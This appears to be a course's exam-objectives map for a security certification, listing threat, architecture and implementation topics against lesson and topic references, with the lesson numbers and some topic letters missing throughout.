Remote access Trojan (RAT) | Lesson , Topic B
Rootkit | Lesson , Topic B
Backdoor | Lesson , Topic B
Password attacks | Lesson , Topic B
Spraying | Lesson , Topic B
Dictionary | Lesson , Topic B
Brute force | Lesson , Topic B
Offline | Lesson , Topic B
Online | Lesson , Topic B
Rainbow tables | Lesson , Topic B
Plaintext/unencrypted | Lesson , Topic B
Physical attacks | Lesson , Topic A; Lesson , Topic A
Malicious universal serial bus (USB) cable | Lesson , Topic A
Malicious flash drive | Lesson , Topic A


Card cloning | Lesson , Topic A
Skimming | Lesson , Topic A
Adversarial artificial intelligence (AI) | Lesson , Topic C
Tainted training data for machine learning (ML) | Lesson , Topic C
Security of machine learning algorithms | Lesson , Topic C
Supply chain attacks | Lesson , Topic A
Cloud-based vs. on-premises attacks | Lesson , Topic B
Cryptographic attacks | Lesson , Topic C
Birthday | Lesson , Topic C
Collision | Lesson , Topic C
Downgrade | Lesson , Topic C
1.3 Given a scenario, analyze potential indicators associated with application attacks | Lesson , Topic A; Lesson , Topic B
Privilege escalation | Lesson , Topic A
Cross-site scripting | Lesson , Topic B
Injections | Lesson , Topic B; Lesson , Topic A
Structured query language (SQL) | Lesson , Topic B
Dynamic link library (DLL) | Lesson , Topic A
Lightweight directory access protocol (LDAP) | Lesson , Topic B
Extensible markup language (XML) | Lesson , Topic B
Pointer/object dereference | Lesson , Topic A
Directory traversal | Lesson , Topic B
Buffer overflows | Lesson , Topic A
Race conditions | Lesson , Topic A
Time of check/time of use | Lesson , Topic A
Error handling | Lesson , Topic A
Improper input handling | Lesson , Topic A
Replay attack | Lesson , Topic B
Session replays | Lesson , Topic B
Integer overflow | Lesson , Topic A
Request forgeries | Lesson , Topic B
Server-side | Lesson , Topic B
Cross-site | Lesson , Topic B
Application programming interface (API) attacks | Lesson , Topic B
Resource exhaustion | Lesson , Topic A
Memory leak | Lesson , Topic A
Secure sockets layer (SSL) stripping | Lesson , Topic B
Driver manipulation | Lesson , Topic A
Shimming | Lesson , Topic A
Refactoring | Lesson , Topic A
Pass the hash | Lesson , Topic A


1.4 Given a scenario, analyze potential indicators associated with network attacks | Lesson , Topic B; Lesson , Topic C; Lesson , Topic D; Lesson , Topic A; Lesson , Topic B; Lesson , Topic D
Wireless | Lesson , Topic C; Lesson , Topic B
Evil twin | Lesson , Topic C
Rogue access point | Lesson , Topic C
Bluesnarfing | Lesson , Topic B
Bluejacking | Lesson , Topic B
Disassociation | Lesson , Topic C
Jamming | Lesson , Topic C
Radio frequency identifier (RFID) | Lesson , Topic B
Near field communication (NFC) | Lesson , Topic B
Initialization vector (IV) | Lesson , Topic C
On-path attack (previously known as man-in-the-middle attack/man-in-the-browser attack) | Lesson , Topic B; Lesson , Topic D
Layer 2 attacks | Lesson , Topic B
Address resolution protocol (ARP) poisoning | Lesson , Topic B
Media access control (MAC) flooding | Lesson , Topic B
MAC cloning | Lesson , Topic B
Domain name system (DNS) | Lesson , Topic A
Domain hijacking | Lesson , Topic A
DNS poisoning | Lesson , Topic A
Universal resource locator (URL) redirection | Lesson , Topic A
Domain reputation | Lesson , Topic A
Distributed denial-of-service (DDoS) | Lesson , Topic D
Network | Lesson , Topic D
Application | Lesson , Topic D
Operational technology (OT) | Lesson , Topic D
Malicious code or script execution | Lesson , Topic D
PowerShell | Lesson , Topic D
Python | Lesson , Topic D
Bash | Lesson , Topic D
Macros | Lesson , Topic D
Visual Basic for Applications (VBA) | Lesson , Topic D
1.5 Explain different threat actors, vectors, and intelligence sources | Lesson , Topic A; Lesson , Topic B
Actors and threats | Lesson , Topic A
Advanced persistent threat (APT) | Lesson , Topic A
Insider threats | Lesson , Topic A


State actors | Lesson , Topic A
Hacktivists | Lesson , Topic A
Script kiddies | Lesson , Topic A
Criminal syndicates | Lesson , Topic A
Hackers | Lesson , Topic A
Authorized | Lesson , Topic A
Unauthorized | Lesson , Topic A
Semi-authorized | Lesson , Topic A
Shadow IT | Lesson , Topic A
Competitors | Lesson , Topic A
Attributes of actors | Lesson , Topic A
Internal/external | Lesson , Topic A
Level of sophistication/capability | Lesson , Topic A
Resources/funding | Lesson , Topic A
Intent/motivation | Lesson , Topic A
Vectors | Lesson , Topic A
Direct access | Lesson , Topic A
Wireless | Lesson , Topic A
Email | Lesson , Topic A
Supply chain | Lesson , Topic A
Social media | Lesson , Topic A
Removable media | Lesson , Topic A
Cloud | Lesson , Topic A
Threat intelligence sources | Lesson , Topic B
Open source intelligence (OSINT) | Lesson , Topic B
Closed/proprietary | Lesson , Topic B
Vulnerability databases | Lesson , Topic B
Public/private information sharing centers | Lesson , Topic B
Dark web | Lesson , Topic B
Indicators of compromise | Lesson , Topic B
Automated indicator sharing (AIS) | Lesson , Topic B
Structured Threat Information eXpression (STIX)/Trusted Automated eXchange of Indicator Information (TAXII) | Lesson , Topic B
Predictive analysis | Lesson , Topic B
Threat maps | Lesson , Topic B
File/code repositories | Lesson , Topic B
Research sources | Lesson , Topic B
Vendor websites | Lesson , Topic B
Vulnerability feeds | Lesson , Topic B
Conferences | Lesson , Topic B
Academic journals Lesson , Topic
Request for comments (RFC) Lesson , Topic
Local industry groups Lesson , Topic
Social media Lesson , Topic
Threat feeds Lesson , Topic
Adversary tactics, techniques, and procedures (TTP) Lesson , Topic
1.6 Explain the security concerns associated with various types of vulnerabilities Lesson , Topic
Cloud-based vs. on-premises vulnerabilities Lesson , Topic
Zero-day Lesson , Topic
Weak configurations Lesson , Topic
Open permissions Lesson , Topic
Unsecure root accounts Lesson , Topic
Errors Lesson , Topic
Weak encryption Lesson , Topic
Unsecure protocols Lesson , Topic
Default settings Lesson , Topic
Open ports and services Lesson , Topic
Third-party risks Lesson , Topic
Vendor management Lesson , Topic
System integration Lesson , Topic
Lack of vendor support Lesson , Topic
Supply chain Lesson , Topic
Outsourced code development Lesson , Topic
Data storage Lesson , Topic
Improper or weak patch management Lesson , Topic
Firmware Lesson , Topic
Operating system (OS) Lesson , Topic
Applications Lesson , Topic
Legacy platforms Lesson , Topic
Impacts Lesson , Topic
Data loss Lesson , Topic
Data breaches Lesson , Topic
Data exfiltration Lesson , Topic
Identity theft Lesson , Topic
Financial Lesson , Topic
Reputation Lesson , Topic
Availability loss Lesson , Topic
1.7 Summarize the techniques used in security assessments Lesson , Topic C
Lesson , Topic C
Threat hunting Lesson , Topic C
Intelligence fusion Lesson , Topic C
Threat feeds Lesson , Topic C
Advisories and bulletins Lesson , Topic C
Maneuver Lesson , Topic C
Vulnerability scans Lesson , Topic C
False positives Lesson , Topic C
False negatives Lesson , Topic C
Log reviews Lesson , Topic C
Credentialed vs. non-credentialed Lesson , Topic C
Intrusive vs. non-intrusive Lesson , Topic C
Application Lesson , Topic C
Web application Lesson , Topic C
Network Lesson , Topic C
Common Vulnerabilities and Exposures (CVE)/Common Vulnerability Scoring System (CVSS) Lesson , Topic C
Configuration review Lesson , Topic C
Syslog/Security information and event management (SIEM) Lesson , Topic C
Review reports Lesson , Topic C
Packet capture Lesson , Topic C
Data inputs Lesson , Topic C
User behavior analysis Lesson , Topic C
Sentiment analysis Lesson , Topic C
Security monitoring Lesson , Topic C
Log aggregation Lesson , Topic C
Log collectors Lesson , Topic C
Security orchestration, automation, and response (SOAR) Lesson , Topic C
1.8 Explain the techniques used in penetration testing Lesson , Topic D
Penetration testing Lesson , Topic D
Known environment Lesson , Topic D
Unknown environment Lesson , Topic D
Partially known environment Lesson , Topic D
Rules of engagement Lesson , Topic D
Lateral movement Lesson , Topic D
Privilege escalation Lesson , Topic D
Persistence Lesson , Topic D
Cleanup Lesson , Topic D
Bug bounty Lesson , Topic D
Pivoting Lesson , Topic D
Passive and active reconnaissance Lesson , Topic D
Drones Lesson , Topic D
War flying Lesson , Topic D
War driving Lesson , Topic D
Footprinting Lesson , Topic D
OSINT Lesson , Topic D
Exercise types Lesson , Topic D
Red-team Lesson , Topic D
Blue-team Lesson , Topic D
White-team Lesson , Topic D
Purple-team Lesson , Topic D
2.0 Architecture and Design
2.1 Explain the importance of security concepts in an enterprise environment Lesson , Topic A
Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Configuration management Lesson , Topic C
Diagrams Lesson , Topic C
Baseline configuration Lesson , Topic C
Standard naming conventions Lesson , Topic C
Internet protocol (IP) schema Lesson , Topic C
Data sovereignty Lesson , Topic A
Data protection Lesson , Topic
Data loss prevention (DLP) Lesson , Topic
Masking Lesson , Topic
Encryption Lesson , Topic
At rest Lesson , Topic
In transit/motion Lesson , Topic
In processing Lesson , Topic
Tokenization Lesson , Topic
Rights management Lesson , Topic
Geographical considerations Lesson , Topic A
Response and recovery controls Lesson , Topic C
Secure Sockets Layer (SSL)/Transport Layer Security (TLS) inspection Lesson , Topic
Hashing Lesson , Topic A
API considerations Lesson , Topic
Site resiliency Lesson , Topic C
Hot site Lesson , Topic C
Cold site Lesson , Topic C
Warm site Lesson , Topic C
Deception and disruption Lesson , Topic C
Honeypots Lesson , Topic C
Honeyfiles Lesson , Topic C
Honeynets Lesson , Topic C
Fake telemetry Lesson , Topic C
DNS sinkhole Lesson , Topic C
2.2 Summarize virtualization and cloud computing concepts Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Cloud models Lesson , Topic A
Infrastructure as a service (IaaS) Lesson , Topic A
Platform as a service (PaaS) Lesson , Topic A
Software as a service (SaaS) Lesson , Topic A
Anything as a service (XaaS) Lesson , Topic A
Public Lesson , Topic A
Community Lesson , Topic A
Private Lesson , Topic A
Hybrid Lesson , Topic A
Managed service provider (MSP)/managed security service provider (MSSP) Lesson , Topic A
On-premises vs. off-premises Lesson , Topic A
Fog computing Lesson , Topic C
Edge computing Lesson , Topic C
Thin client Lesson , Topic A
Containers Lesson , Topic A
Microservices/API Lesson , Topic C
Infrastructure as code Lesson , Topic C
Software-defined networking (SDN) Lesson , Topic C
Software-defined visibility (SDV) Lesson , Topic C
Serverless architecture Lesson , Topic C
Services integration Lesson , Topic C
Resource policies Lesson , Topic
Transit gateway Lesson , Topic
Virtualization Lesson , Topic A
Virtual machine (VM) sprawl avoidance Lesson , Topic A
VM escape protection Lesson , Topic A
2.3 Summarize secure application development, deployment, and automation concepts Lesson , Topic C
Lesson , Topic
Environment Lesson , Topic
Development Lesson , Topic
Test Lesson , Topic
Staging Lesson , Topic
Production Lesson , Topic
Quality assurance (QA) Lesson , Topic
Provisioning and deprovisioning Lesson , Topic
Integrity measurement Lesson , Topic
Secure coding techniques Lesson , Topic C
Normalization Lesson , Topic C
Stored procedures Lesson , Topic C
Obfuscation/camouflage Lesson , Topic C
Code reuse/dead code Lesson , Topic C
Server-side vs. client-side execution and validation Lesson , Topic C
Memory management Lesson , Topic C
Use of third-party libraries and software development kits (SDKs) Lesson , Topic C
Data exposure Lesson , Topic C
Open Web Application Security Project (OWASP) Lesson , Topic C
Software diversity Lesson , Topic
Compiler Lesson , Topic
Binary Lesson , Topic
Automation/scripting Lesson , Topic
Automated courses of action Lesson , Topic
Continuous monitoring Lesson , Topic
Continuous validation Lesson , Topic
Continuous integration Lesson , Topic
Continuous delivery Lesson , Topic
Continuous deployment Lesson , Topic
Elasticity Lesson , Topic
Scalability Lesson , Topic
Version control Lesson , Topic
2.4 Summarize authentication and authorization design concepts Lesson , Topic A
Lesson , Topic C
Lesson , Topic D
Authentication methods Lesson , Topic C
Directory services Lesson , Topic C
Federation Lesson , Topic C
Attestation Lesson , Topic C
Technologies Lesson , Topic C
Time-based one-time password (TOTP) Lesson , Topic C
HMAC-based one-time password (HOTP) Lesson , Topic C
Short message service (SMS) Lesson , Topic C
Token key Lesson , Topic C
Static codes Lesson , Topic C
Authentication applications Lesson , Topic C
Push notifications Lesson , Topic C
Phone call Lesson , Topic C
Smart card authentication Lesson , Topic C
Biometrics Lesson , Topic D
Fingerprint Lesson , Topic D
Retina Lesson , Topic D
Iris Lesson , Topic D
Facial Lesson , Topic D
Voice Lesson , Topic D
Vein Lesson , Topic D
Gait analysis Lesson , Topic D
Efficacy rates Lesson , Topic D
False acceptance Lesson , Topic D
False rejection Lesson , Topic D
Crossover error rate Lesson , Topic D
Multifactor authentication (MFA) factors and attributes Lesson , Topic A
Factors Lesson , Topic A
Something you know Lesson , Topic A
Something you have Lesson , Topic A
Something you are Lesson , Topic A
Attributes Lesson , Topic A
Somewhere you are Lesson , Topic A
Something you can do Lesson , Topic A
Something you exhibit Lesson , Topic A
Someone you know Lesson , Topic A
Authentication, authorization, and accounting (AAA) Lesson , Topic A
Cloud vs. on-premises requirements Lesson , Topic A
2.5 Given a scenario, implement cybersecurity resilience Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Redundancy Lesson , Topic A
Geographic dispersal Lesson , Topic A
Disk Lesson , Topic A
Redundant array of inexpensive disks (RAID) levels Lesson , Topic A
Multipath Lesson , Topic A
Network Lesson , Topic A
Load balancers Lesson , Topic A
Network interface card (NIC) teaming Lesson , Topic A
Power Lesson , Topic A
Uninterruptible power supply (UPS) Lesson , Topic A
Generator Lesson , Topic A
Dual supply Lesson , Topic A
Managed power distribution units (PDUs) Lesson , Topic A
Replication Lesson , Topic A
Storage area network Lesson , Topic A
VM Lesson , Topic A
On-premises vs. cloud Lesson , Topic A
Backup types Lesson , Topic
Full Lesson , Topic
Incremental Lesson , Topic
Snapshot Lesson , Topic
Differential Lesson , Topic
Tape Lesson , Topic
Disk Lesson , Topic
Copy Lesson , Topic
Network-attached storage (NAS) Lesson , Topic
Storage area network Lesson , Topic
Cloud Lesson , Topic
Image Lesson , Topic
Online vs. offline Lesson , Topic
Offsite storage Lesson , Topic
Distance considerations Lesson , Topic
Non-persistence Lesson , Topic
Revert to known state Lesson , Topic
Last known-good configuration Lesson , Topic
Live boot media Lesson , Topic
High availability Lesson , Topic A
Scalability Lesson , Topic A
Restoration order Lesson , Topic
Diversity Lesson , Topic C
Technologies Lesson , Topic C
Vendors Lesson , Topic C
Crypto Lesson , Topic C
Controls Lesson , Topic C
2.6 Explain the security implications of embedded and specialized systems Lesson , Topic C
Embedded systems Lesson , Topic C
Raspberry Pi Lesson , Topic C
Field-programmable gate array (FPGA) Lesson , Topic C
Arduino Lesson , Topic C
Supervisory control and data acquisition (SCADA)/industrial control system (ICS) Lesson , Topic C
Facilities Lesson , Topic C
Industrial Lesson , Topic C
Manufacturing Lesson , Topic C
Energy Lesson , Topic C
Logistics Lesson , Topic C
Internet of Things (IoT) Lesson , Topic C
Sensors Lesson , Topic C
Smart devices Lesson , Topic C
Wearables Lesson , Topic C
Facility automation Lesson , Topic C
Weak defaults Lesson , Topic C
Specialized Lesson , Topic C
Medical systems Lesson , Topic C
Vehicles Lesson , Topic C
Aircraft Lesson , Topic C
Smart meters Lesson , Topic C
Voice over IP (VoIP) Lesson , Topic C
Heating, ventilation, air conditioning (HVAC) Lesson , Topic C
Drones Lesson , Topic C
Multifunction printer (MFP) Lesson , Topic C
Real-time operating system (RTOS) Lesson , Topic C
Surveillance systems Lesson , Topic C
System on chip (SoC) Lesson , Topic C
Communication considerations Lesson , Topic C
5G Lesson , Topic C
Narrow-band Lesson , Topic C
Baseband radio Lesson , Topic C
Subscriber identity module (SIM) cards Lesson , Topic C
Zigbee Lesson , Topic C
Constraints Lesson , Topic C
Power Lesson , Topic C
Compute Lesson , Topic C
Network Lesson , Topic C
Crypto Lesson , Topic C
Inability to patch Lesson , Topic C
Authentication Lesson , Topic C
Range Lesson , Topic C
Cost Lesson , Topic C
Implied trust Lesson , Topic C
2.7 Explain the importance of physical security controls Lesson , Topic A
Lesson , Topic
Bollards/barricades Lesson , Topic A
Access control vestibules Lesson , Topic A
Badges Lesson , Topic A
Alarms Lesson , Topic A
Signage Lesson , Topic A
Cameras Lesson , Topic A
Motion recognition Lesson , Topic A
Object detection Lesson , Topic A
Closed-circuit television (CCTV) Lesson , Topic A
Industrial camouflage Lesson , Topic A
Personnel Lesson , Topic A
Guards Lesson , Topic A
Robot sentries Lesson , Topic A
Reception Lesson , Topic A
Two-person integrity/control Lesson , Topic A
Locks Lesson , Topic A
Biometrics Lesson , Topic A
Electronic Lesson , Topic A
Physical Lesson , Topic A
Cable locks Lesson , Topic A
USB data blocker Lesson , Topic A
Lighting Lesson , Topic A
Fencing Lesson , Topic A
Fire suppression Lesson , Topic
Sensors Lesson , Topic A
Lesson , Topic
Motion detection Lesson , Topic A
Noise detection Lesson , Topic A
Proximity reader Lesson , Topic A
Moisture detection Lesson , Topic
Cards Lesson , Topic A
Temperature Lesson , Topic
Drones Lesson , Topic A
Visitor logs Lesson , Topic A
Faraday cages Lesson , Topic
Air gap Lesson , Topic
Screened subnet (previously known as demilitarized zone) Lesson , Topic A
Protected cable distribution Lesson , Topic
Secure areas Lesson , Topic
Air gap Lesson , Topic
Vault Lesson , Topic
Safe Lesson , Topic
Hot aisle Lesson , Topic
Cold aisle Lesson , Topic
Secure data destruction Lesson , Topic
Burning Lesson , Topic
Shredding Lesson , Topic
Pulping Lesson , Topic
Pulverizing Lesson , Topic
Degaussing Lesson , Topic
Third-party solutions Lesson , Topic
2.8 Summarize the basics of cryptographic concepts Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Lesson , Topic D
Digital signatures Lesson , Topic
Key length Lesson , Topic A
Key stretching Lesson , Topic C
Salting Lesson , Topic C
Hashing Lesson , Topic A
Key exchange Lesson , Topic
Elliptic-curve cryptography Lesson , Topic A
Perfect forward secrecy Lesson , Topic
Quantum Lesson , Topic D
Communications Lesson , Topic D
Computing Lesson , Topic D
Post-quantum Lesson , Topic D
Ephemeral Lesson , Topic
Modes of operation Lesson , Topic
Authenticated Lesson , Topic
Unauthenticated Lesson , Topic
Counter Lesson , Topic
Blockchain Lesson , Topic D
Public ledgers Lesson , Topic D
Cipher suites Lesson , Topic A
Stream Lesson , Topic A
Block Lesson , Topic A
Symmetric vs. asymmetric Lesson , Topic A
Lightweight cryptography Lesson , Topic D
Steganography Lesson , Topic D
Audio Lesson , Topic D
Video Lesson , Topic D
Image Lesson , Topic D
Homomorphic encryption Lesson , Topic D
Common use cases Lesson , Topic C
Low-power devices Lesson , Topic C
Low-latency Lesson , Topic C
High resiliency Lesson , Topic C
Supporting confidentiality Lesson , Topic C
Supporting integrity Lesson , Topic C
Supporting obfuscation Lesson , Topic C
Supporting authentication Lesson , Topic C
Supporting non-repudiation Lesson , Topic C
Limitations Lesson , Topic C
Speed Lesson , Topic C
Size Lesson , Topic C
Weak keys Lesson , Topic C
Time Lesson , Topic C
Longevity Lesson , Topic C
Predictability Lesson , Topic C
Reuse Lesson , Topic C
Entropy Lesson , Topic C
Computational overheads Lesson , Topic C
Resource vs. security constraints Lesson , Topic C
3.0 Implementation
3.1 Given a scenario, implement secure protocols Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Protocols Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Domain Name System Security Extensions (DNSSEC) Lesson , Topic A
Lesson , Topic C
Secure/Multipurpose Internet Mail Extensions (S/MIME) Lesson , Topic
Secure Real-time Protocol (SRTP) Lesson , Topic
Lightweight Directory Access Protocol over SSL (LDAPS) Lesson , Topic A
File Transfer Protocol, Secure (FTPS) Lesson , Topic
SSH File Transfer Protocol (SFTP) Lesson , Topic
Simple Network Management Protocol, version 3 (SNMPv3) Lesson , Topic A
Hypertext transfer protocol over SSL/TLS (HTTPS) Lesson , Topic
IPSec Lesson , Topic C
Authentication header (AH)/Encapsulated security payloads (ESP) Lesson , Topic C
Tunnel/transport Lesson , Topic C
Secure Post Office Protocol (POP)/Internet Message Access Protocol (IMAP) Lesson , Topic
Use cases Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Voice and video Lesson , Topic
Time synchronization Lesson , Topic A
Email and web Lesson , Topic
File transfer Lesson , Topic
Directory services Lesson , Topic A
Remote access Lesson , Topic C
Domain name resolution Lesson , Topic A
Routing and switching Lesson , Topic
Network address allocation Lesson , Topic A
Subscription services Lesson , Topic
3.2 Given a scenario, implement host or application security solutions Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Lesson , Topic D
Lesson , Topic
Endpoint protection Lesson , Topic
Antivirus Lesson , Topic
Anti-malware Lesson , Topic
Endpoint detection and response (EDR) Lesson , Topic
DLP Lesson , Topic
Next-generation firewall (NGFW) Lesson , Topic
Host-based intrusion prevention system (HIPS) Lesson , Topic
Host-based intrusion detection system (HIDS) Lesson , Topic
Host-based firewall Lesson , Topic
Boot integrity Lesson , Topic A
Boot security/Unified Extensible Firmware Interface (UEFI) Lesson , Topic A
Measured boot Lesson , Topic A
Boot attestation Lesson , Topic A
Database Lesson , Topic
Tokenization Lesson , Topic
Salting Lesson , Topic
Hashing Lesson , Topic
Application security Lesson , Topic C
Lesson , Topic D
Input validations Lesson , Topic C
Secure cookies Lesson , Topic C
Hypertext Transfer Protocol (HTTP) headers Lesson , Topic C
Code signing Lesson , Topic D
Allow list Lesson , Topic D
Block list/deny list Lesson , Topic D
Secure coding practices Lesson , Topic C
Static code analysis Lesson , Topic C
Manual code review Lesson , Topic C
Dynamic code analysis Lesson , Topic C
Fuzzing Lesson , Topic C
Hardening Lesson , Topic
Open ports and services Lesson , Topic
Registry Lesson , Topic
Disk encryption Lesson , Topic
OS Lesson , Topic
Patch management Lesson , Topic
Third-party updates Lesson , Topic
Auto-update Lesson , Topic
Self-encrypting drive (SED)/full-disk encryption (FDE) Lesson , Topic A
Opal Lesson , Topic A
Hardware root of trust Lesson , Topic A
Trusted Platform Module (TPM) Lesson , Topic A
Sandboxing Lesson , Topic
3.3 Given a scenario, implement secure network designs Lesson , Topic C
Lesson , Topic A
Lesson , Topic
Lesson , Topic D
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Load balancing Lesson , Topic D
Active/active Lesson , Topic D
Active/passive Lesson , Topic D
Scheduling Lesson , Topic D
Virtual IP Lesson , Topic D
Persistence Lesson , Topic D
Network segmentation Lesson , Topic A
Virtual local area network (VLAN) Lesson , Topic A
Screened subnet (previously known as demilitarized zone) Lesson , Topic A
East-west traffic Lesson , Topic A
Extranet Lesson , Topic A
Intranet Lesson , Topic A
Zero Trust Lesson , Topic A
Virtual private network (VPN) Lesson , Topic C
Always-on Lesson , Topic C
Split tunnel vs. full tunnel Lesson , Topic C
Remote access vs. site-to-site Lesson , Topic C
IPSec Lesson , Topic C
SSL/TLS Lesson , Topic C
HTML5 Lesson , Topic C
Layer 2 tunneling protocol (L2TP) Lesson , Topic C
DNS Lesson , Topic A
Network access control (NAC) Lesson , Topic
Agent and agentless Lesson , Topic
Out-of-band management Lesson , Topic C
Port security Lesson , Topic
Broadcast storm prevention Lesson , Topic
Bridge Protocol Data Unit (BPDU) guard Lesson , Topic
Loop prevention Lesson , Topic
Dynamic Host Configuration Protocol (DHCP) snooping Lesson , Topic
Media access control (MAC) filtering Lesson , Topic
Network appliances Lesson , Topic C
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Jump servers Lesson , Topic C
Proxy servers Lesson , Topic A
Forward Lesson , Topic A
Reverse Lesson , Topic A
Network-based intrusion detection system (NIDS)/network-based intrusion prevention system (NIPS) Lesson , Topic
Signature-based Lesson , Topic
Heuristic/behavior Lesson , Topic
Anomaly Lesson , Topic
Inline vs. passive Lesson , Topic
HSM Lesson , Topic C
Sensors Lesson , Topic
Collectors Lesson , Topic C
Aggregators Lesson , Topic C
Firewalls Lesson , Topic A
Lesson , Topic
Web application firewall (WAF) Lesson , Topic
NGFW Lesson , Topic
Stateful Lesson , Topic A
Stateless Lesson , Topic A
Unified threat management (UTM) Lesson , Topic
Network address translation (NAT) gateway Lesson , Topic A
Content/URL filter Lesson , Topic
Open-source vs. proprietary Lesson , Topic A
Hardware vs. software Lesson , Topic A
Appliance vs. host-based vs. virtual Lesson , Topic A
Access control list (ACL) Lesson , Topic A
Route security Lesson , Topic
Quality of service (QoS) Lesson , Topic D
Implications of IPv6 Lesson , Topic A
Port spanning/port mirroring Lesson , Topic
Port taps Lesson , Topic
Monitoring services Lesson , Topic C
File integrity monitors Lesson , Topic
3.4 Given a scenario, install and configure wireless security settings Lesson , Topic C
Cryptographic protocols Lesson , Topic C
WiFi Protected Access 2 (WPA2) Lesson , Topic C
WiFi Protected Access 3 (WPA3) Lesson , Topic C
Counter-mode/CBC-MAC protocol (CCMP) Lesson , Topic C
Simultaneous Authentication of Equals (SAE) Lesson , Topic C
Authentication protocols Lesson , Topic C
Extensible Authentication Protocol (EAP) Lesson , Topic C
Protected Extensible Application Protocol (PEAP) Lesson , Topic C
EAP-FAST Lesson , Topic C
EAP-TLS Lesson , Topic C
EAP-TTLS Lesson , Topic C
IEEE 802.1X Lesson , Topic C
Remote Authentication Dial-in User Service (RADIUS) Federation Lesson , Topic C
Methods Lesson , Topic C
Pre-shared key (PSK) vs. Enterprise vs. Open Lesson , Topic C
WiFi Protected Setup (WPS) Lesson , Topic C
Captive portals Lesson , Topic C
Installation considerations Lesson , Topic C
Site surveys Lesson , Topic C
Heat maps Lesson , Topic C
WiFi analyzers Lesson , Topic C
Channel overlaps Lesson , Topic C
Wireless access point (WAP) placement Lesson , Topic C
Controller and access point security Lesson , Topic C
3.5 Given a scenario, implement secure mobile solutions Lesson , Topic A
Lesson , Topic
Connection methods and receivers Lesson , Topic
Cellular Lesson , Topic
WiFi Lesson , Topic
Bluetooth Lesson , Topic
NFC Lesson , Topic
Infrared Lesson , Topic
USB Lesson , Topic
Point-to-point Lesson , Topic
Point-to-multipoint Lesson , Topic
Global Positioning System (GPS) Lesson , Topic
RFID Lesson , Topic
Mobile device management (MDM) Lesson , Topic A
Lesson , Topic
Application management Lesson , Topic A
Content management Lesson , Topic A
Remote wipe Lesson , Topic A
Geofencing Lesson , Topic A
Geolocation Lesson , Topic A
Screen locks Lesson , Topic A
Push notifications Lesson , Topic
Passwords and PINs Lesson , Topic A
Biometrics Lesson , Topic A
Context-aware authentication Lesson , Topic A
Containerization Lesson , Topic A
Storage segmentation Lesson , Topic A
Full device encryption Lesson , Topic A
Mobile devices Lesson , Topic A
MicroSD HSM Lesson , Topic A
MDM/Unified Endpoint Management (UEM) Lesson , Topic A
Mobile application management (MAM) Lesson , Topic A
SEAndroid Lesson , Topic A
Enforcement and monitoring of: Lesson , Topic A
Lesson , Topic
Third-party application stores Lesson , Topic A
Rooting/jailbreaking Lesson , Topic A
Sideloading Lesson , Topic A
Custom firmware Lesson , Topic A
Carrier unlocking Lesson , Topic A
Firmware over-the-air (OTA) updates Lesson , Topic
Camera use Lesson , Topic A
SMS/Multimedia Messaging Service (MMS)/Rich communication services (RCS) Lesson , Topic
External media Lesson , Topic A
USB On-The-Go (USB OTG) Lesson , Topic
Recording microphone Lesson , Topic A
GPS tagging Lesson , Topic A
WiFi direct/ad hoc Lesson , Topic
Tethering Lesson , Topic
Hotspot Lesson , Topic
Payment methods Lesson , Topic
Deployment models Lesson , Topic A
Bring your own device (BYOD) Lesson , Topic A
Corporate-owned personally enabled (COPE) Lesson , Topic A
Choose your own device (CYOD) Lesson , Topic A
Corporate-owned Lesson , Topic A
Virtual desktop infrastructure (VDI) Lesson , Topic A
3.6 Given a scenario, apply cybersecurity solutions to the cloud Lesson , Topic
Cloud security controls Lesson , Topic
High availability across zones Lesson , Topic
Resource policies Lesson , Topic
Secrets management Lesson , Topic
Integration and auditing Lesson , Topic
Storage Lesson , Topic
Permissions Lesson , Topic
Encryption Lesson , Topic
Replication Lesson , Topic
High availability Lesson , Topic
Network Lesson , Topic
Virtual networks Lesson , Topic
Public and private subnets Lesson , Topic
Segmentation Lesson , Topic
API inspection and integration Lesson , Topic
Compute Lesson , Topic
Security groups Lesson , Topic
Dynamic resource allocation Lesson , Topic
Instance awareness Lesson , Topic
Virtual private cloud (VPC) endpoint Lesson , Topic
Container security Lesson , Topic
Solutions Lesson , Topic
CASB Lesson , Topic
Application security Lesson , Topic
Next-generation Secure Web Gateway (SWG) Lesson , Topic
Firewall considerations in a cloud environment Lesson , Topic
Cost Lesson , Topic
Need for segmentation Lesson , Topic
Open Systems Interconnection (OSI) layers Lesson , Topic
Cloud native controls vs. third-party solutions Lesson , Topic
3.7 Given a scenario, implement identity and account management controls Lesson , Topic A
Lesson , Topic
Identity Lesson , Topic A
Lesson , Topic
Identity provider (IdP) Lesson , Topic A
Attributes Lesson , Topic
Certificates Lesson , Topic A
Tokens Lesson , Topic A
SSH keys Lesson , Topic A
Smart cards Lesson , Topic A
Account types Lesson , Topic A
User account Lesson , Topic A
Shared and generic accounts/credentials Lesson , Topic A
Guest accounts Lesson , Topic A
Service accounts Lesson , Topic A
Account policies Lesson , Topic
Password complexity Lesson , Topic
Password history Lesson , Topic
Password reuse Lesson , Topic
Network location Lesson , Topic
Geofencing Lesson , Topic
Geotagging Lesson , Topic
Geolocation Lesson , Topic
Time-based logins Lesson , Topic
Access policies Lesson , Topic
Account permissions Lesson , Topic
Account audits Lesson , Topic
Impossible travel time/risky login Lesson , Topic
Lockout Lesson , Topic
Disablement Lesson , Topic
3.8 Given a scenario, implement authentication and authorization solutions Lesson , Topic
Lesson , Topic C
Lesson , Topic C
Authentication management Lesson , Topic
Lesson , Topic C
Password keys Lesson , Topic
Password vaults Lesson , Topic
TPM Lesson , Topic C
HSM Lesson , Topic C
Knowledge-based authentication Lesson , Topic
Authentication/authorization Lesson , Topic
Lesson , Topic C
Lesson , Topic C
EAP Lesson , Topic C
Challenge-Handshake Authentication Protocol (CHAP) Lesson , Topic
Password Authentication Protocol (PAP) Lesson , Topic
802.1X Lesson , Topic C
RADIUS Lesson , Topic C
Single sign-on (SSO) Lesson , Topic
Security Assertions Markup Language (SAML) Lesson , Topic C
Terminal Access Controller Access Control System Plus (TACACS+) Lesson , Topic C
OAuth Lesson , Topic C
OpenID Lesson , Topic C
Kerberos Lesson , Topic
